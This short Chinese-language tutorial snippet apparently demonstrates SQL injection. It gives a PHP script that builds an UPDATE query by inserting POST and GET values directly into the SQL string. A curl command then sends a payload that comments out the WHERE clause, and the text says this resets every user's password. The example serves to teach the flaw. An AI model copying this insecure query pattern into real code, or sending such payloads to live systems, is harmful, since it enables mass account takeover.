在你的web服务目录下 创建一个php文件如下
<?php $conn = db_connect(); $sql = sprintf('update users set password = "%s" where id = %s', $_POST['password'], $_GET['id'] ); echo $sql . PHP_EOL; $result = $conn->query($sql); if(!$result){ echo 'sql执行出错' . PHP_EOL; } function db_connect() { $result = new mysqli('', '', '', ''); if (!$result) { return false; } $result->autocommit(TRUE); return $result; } function db_result_to_array($result) { $res_array = array(); for ($count=0; $row = $result->fetch_assoc(); $count++) { $res_array[$count] = $row; } return $res_array; }
curl模拟 访问传参 post
curl -d "password=123456\";-- " http://localhost:8080/sanitize-validate-escape/sanitize-sql-bad.php?id=1
这样 把 usrs表的所有记录的密码都改为了123456